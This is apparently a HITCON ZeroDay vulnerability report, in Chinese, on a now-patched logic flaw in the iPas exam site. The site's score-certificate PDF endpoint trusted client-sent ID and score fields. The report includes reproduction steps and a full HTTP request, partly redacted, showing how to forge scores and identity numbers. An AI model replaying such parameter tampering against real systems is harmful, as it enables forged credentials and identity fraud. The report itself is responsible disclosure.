iPas 網站下載成績證明 任意竄改身份和偽造成績證明 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-00577
  •  發信 Vendor: 經濟部產業發展署
  • Title: iPas 網站下載成績證明 任意竄改身份和偽造成績證明
  • Introduction: 註冊一隻帳號即可任意竄改和偽造成績證明

處理狀態

目前狀態

公開
Last Update : 2026/06/05
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2026/04/23 15:39:55 : 新提交 (由 CheN.. 更新此狀態)
  • 2026/04/23 15:42:13 : 新提交 (由 CheN.. 更新此狀態)
  • 2026/04/23 15:57:36 : 新提交 (由 CheN.. 更新此狀態)
  • 2026/04/23 20:08:56 : 新提交 (由 CheN.. 更新此狀態)
  • 2026/04/27 17:46:22 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/20 15:51:45 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/20 15:51:45 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/20 15:51:46 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/06/01 11:06:25 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2026/06/01 20:53:02 : 確認已修補 (由 CheN.. 更新此狀態)
  • 2026/06/05 03:00:24 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-00577
  • 通報者:SamChen_696 (CheN..)
  • 風險:高
  • 類型:邏輯漏洞 (Logic Flaws)

參考資料

攻擊者可經由該漏洞繞過網站邏輯行為進行惡意攻擊。

漏洞說明: OWASP - Testing for business logic
https://www.owasp.org/index.php/Testing_for_business_logic

漏洞說明: CWE-840: Business Logic Errors
https://cwe.mitre.org/data/definitions/840.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://reg.ipas.org.tw/Apply/cScorePrint

敘述

聲明:在確認漏洞之後,已刪除不必要的檔案。僅保留我的正常原始的成績證明檔案

概述

最近去考了 iPas 資安工程師中級,今天成績公布我到網站查詢成績後看到可以先行下載成績證明。觀察到在最後產出 pdf 的時候會出現此請求 /Apply/cScorePrint,裡面的參數嘗試修改測試 發現居然可由客戶端修改控制。只要竄改如 SelectedSubjectScore (成績) 以及 ID (身分證字號) 等欄位,系統就會毫無防備生成對應數值的成績證明,導致任何考生都能偽造成績證明與竄改考生資料。

雖然下載前系統會要求確認地址、姓名 電話等,但網站有明確規定身分證字號註冊後不可修改,所以能透過修改請求參數來控制身分證字號與最終成績,絕對非預期行為。

重製步驟

  1. 點擊下載成績證明,並攔截封包
    圖片

  2. 修改身分證字號和分數欄位證明其問題
    圖片

  3. 查閱下載好的 PDF 檔案,確認存在問題 (以我的身分證末兩碼為例,23 --> 24,規劃實務分數 72.5 --> 90)
    圖片

PoC

完整請求封包

POST /Apply/cScorePrint HTTP/1.1
Host: reg.ipas.org.tw
Cookie: [REDACTED]
Content-Length: 978
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept-Language: zh-TW
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://reg.ipas.org.tw
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://reg.ipas.org.tw/Apply/ScorePrint
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

__RequestVerificationToken=[REDACTED]&CName=[REDACTED]&EName=[REDACTED]&EName1=[REDACTED]&EName2=[REDACTED]&Birth=[REDACTED]&ID=[REDACTED]&LicenseID=T02&LicenseName=%E8%B3%87%E8%A8%8A%E5%AE%89%E5%85%A8%E5%B7%A5%E7%A8%8B%E5%B8%AB%E8%83%BD%E5%8A%9B%E9%91%91%E5%AE%9A(T02-%E4%B8%AD%E7%B4%9A)&Subject_0=Subject_0%2C72.5%2C115-01-T02&Subject_1=Subject_1%2C90%2C115-01-T02&SelectedSubjectName=%E8%B3%87%E8%A8%8A%E5%AE%89%E5%85%A8%E8%A6%8F%E5%8A%83%E5%AF%A6%E5%8B%99&SelectedSubjectScore=72.5&SubjectTestDate=2026-04-11&SubjectActivityID=115-01-T02&SelectedSubjectName=%E8%B3%87%E8%A8%8A%E5%AE%89%E5%85%A8%E9%98%B2%E8%AD%B7%E5%AF%A6%E5%8B%99&SelectedSubjectScore=90&SubjectTestDate=2026-04-11&SubjectActivityID=115-01-T02&DocType=1&DocName=%E8%B3%87%E8%A8%8A%E5%AE%89%E5%85%A8%E5%B7%A5%E7%A8%8B%E5%B8%AB-%E4%B8%AD%E7%B4%9A%E8%83%BD%E5%8A%9B%E9%91%91%E5%AE%9A

圖片

影響

任意使用者都可以竄改其身分與成績到證明文件中。

修補建議

產生PDF時,所有身分與成績欄位皆依會話從資料庫取得,完全忽略客戶端POST之對應參數。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;